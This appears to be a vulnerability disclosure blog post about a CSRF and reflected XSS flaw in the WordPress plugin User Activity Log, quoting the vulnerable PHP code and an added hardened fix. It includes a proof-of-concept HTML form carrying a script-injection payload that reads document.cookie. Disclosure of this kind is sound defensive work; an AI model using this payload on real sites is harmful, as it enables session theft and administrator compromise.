29 Jul

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in User Activity Log

Every additional plugin that you add to your WordPress website adds additional security risk, and that includes security plugins. Recently we did a quick check of plugins designed to let you keep track of actions taken by users on your website. In several cases we found rather minor security vulnerabilities. Like the first issue we found in the plugin User Activity Log, this one involves a lack of protection against cross-site request forgery (CSRF).

This vulnerability involves a lack of protection against CSRF when saving the plugin’s settings, due to the absence of a nonce check.

This can be combined with cross-site scripting (XSS) on the Email settings page. While the values are all eventually validated or sanitized, the POST inputs “sol-mail-to” and “sol-mail-from” are stored in the variables $to_email and $from_email respectively before they are validated, in the file /user_settings_menu.php:

// Raw POST values are assigned before any validation takes place.
$to_email = $_POST['sol-mail-to'];
$from_email = $_POST['sol-mail-from'];
$mail_msg = ual_test_input($_POST['sol-mail-msg']);
$emailEnable = $_POST['emailEnable'];
update_option('enable_email', $emailEnable);
if (isset($_POST['emailEnable'])) {
	if ($_POST['emailEnable'] == '1') {
		if ($mail_msg == "") {
			$msg = __("Please enter message", 'wp_user_log');
		}
		if ($to_email == "" || $from_email == "") {
			$msg = __("Please enter the email address", 'wp_user_log');
		}
		// Invalid addresses are rejected here and never saved, but $to_email and
		// $from_email still hold the unsanitized POST values at this point.
		if (!filter_var($to_email, FILTER_VALIDATE_EMAIL) || !filter_var($from_email, FILTER_VALIDATE_EMAIL) || !is_email($to_email) || !is_email($from_email)) {
			$msg = __("Please enter valid email address", 'wp_user_log');
		} else {
			update_option('to_email', $to_email);
			update_option('from_email', $from_email);
			update_option('email_message', $mail_msg);
		}
	}
}

Placing malicious JavaScript code in those inputs will not cause the values to be saved permanently, but the values are later echoed out, unescaped, on the page at line 530:

<input name="sol-mail-from" type="email" value="<?php echo $from_email; ?>" />

and at line 537:

<input name="sol-mail-to" type="email" value="<?php echo $to_email; ?>" />

Since the cross-site scripting (XSS) is reflected and not persistent, in major web browsers other than Firefox it would be hard to exploit this since you would need to get around the XSS filtering they include to protect against this type of exploit.
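The fix for both issues is the standard WordPress pattern: tie the form submission to a nonce so a cross-site form cannot be replayed, sanitize the inputs before they are used anywhere, and escape every value on output. The following is an added example of what a hardened version of the handler above could look like; it is not the plugin’s code, and the action name 'ual_save_email_settings', the nonce field name 'ual_email_nonce', the function name and the surrounding form markup are assumptions chosen for this example. Only the WordPress API calls it relies on (check_admin_referer, wp_nonce_field, sanitize_email, is_email, esc_attr, esc_textarea) are real.

```php
<?php
// Added example, not the User Activity Log plugin's own code. Assumes it runs
// inside WordPress so the nonce, option and escaping functions are available.
// Action name, nonce field name and function name are assumptions for this example.

function ual_example_handle_email_settings() {
    // Only users who may manage options should reach this handler at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        return '';
    }

    // Values shown in the form come from stored options, never from raw POST data.
    $to_email   = get_option( 'to_email', '' );
    $from_email = get_option( 'from_email', '' );
    $mail_msg   = get_option( 'email_message', '' );
    $msg        = '';

    if ( isset( $_POST['btnsolEmail'] ) ) {
        // CSRF protection: the request must carry a nonce bound to this action and
        // to the logged-in user. check_admin_referer() stops with an error page if
        // the nonce is missing or invalid, so a forged cross-site form never gets
        // past this line.
        check_admin_referer( 'ual_save_email_settings', 'ual_email_nonce' );

        $enable = ( isset( $_POST['emailEnable'] ) && '1' === $_POST['emailEnable'] ) ? '1' : '0';
        update_option( 'enable_email', $enable );

        if ( '1' === $enable ) {
            // Sanitize on input, before the values are assigned to anything.
            $to_email   = sanitize_email( wp_unslash( $_POST['sol-mail-to'] ?? '' ) );
            $from_email = sanitize_email( wp_unslash( $_POST['sol-mail-from'] ?? '' ) );
            $mail_msg   = sanitize_textarea_field( wp_unslash( $_POST['sol-mail-msg'] ?? '' ) );

            if ( '' === $mail_msg ) {
                $msg = __( 'Please enter message', 'wp_user_log' );
            } elseif ( ! is_email( $to_email ) || ! is_email( $from_email ) ) {
                $msg = __( 'Please enter valid email address', 'wp_user_log' );
            } else {
                update_option( 'to_email', $to_email );
                update_option( 'from_email', $from_email );
                update_option( 'email_message', $mail_msg );
            }
        }
    }

    ob_start();
    ?>
    <form method="post">
        <?php // The nonce field is what check_admin_referer() verifies above. ?>
        <?php wp_nonce_field( 'ual_save_email_settings', 'ual_email_nonce' ); ?>
        <?php if ( '' !== $msg ) : ?>
            <p><?php echo esc_html( $msg ); ?></p>
        <?php endif; ?>
        <input name="emailEnable" type="checkbox" value="1" <?php checked( get_option( 'enable_email' ), '1' ); ?> />
        <?php // Output escaping: esc_attr() turns a stray quote or angle bracket into
              // an HTML entity, so a value that fails validation is rendered as text
              // inside the attribute rather than breaking out of it. ?>
        <input name="sol-mail-from" type="email" value="<?php echo esc_attr( $from_email ); ?>" />
        <input name="sol-mail-to" type="email" value="<?php echo esc_attr( $to_email ); ?>" />
        <textarea name="sol-mail-msg"><?php echo esc_textarea( $mail_msg ); ?></textarea>
        <input type="submit" name="btnsolEmail" value="Save Changes" />
    </form>
    <?php
    return ob_get_clean();
}
```

Two details matter for the reflected case described above. First, the values that are echoed back after a failed validation are the sanitized ones, not the raw POST values, and they pass through esc_attr() regardless, so the page no longer depends on browser-side XSS filtering. Second, because the nonce check runs before any option is written, the enable_email option can no longer be flipped by a forged request either, which the original code did unconditionally before validating anything.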

We received a response from the developer the same day we contacted them about this issue and the other one we discovered, but a month later the plugin has yet to receive an update, so the vulnerabilities still exist in the current version, 1.2.3.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box when logged in to WordPress as an Administrator. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=email_settings_menu" method="POST">
<input type="hidden" name="emailEnable" value="1" />
<input type="hidden" name="sol-mail-from" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="btnsolEmail" value="Save Changes" />
</form>
</body>
</html>

Timeline

  • 6/29/2016 – Developer notified.
  • 6/29/2016 – Developer responds.
  • 10/11/2016 – Version 1.2.6 released, which fixes issue.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.
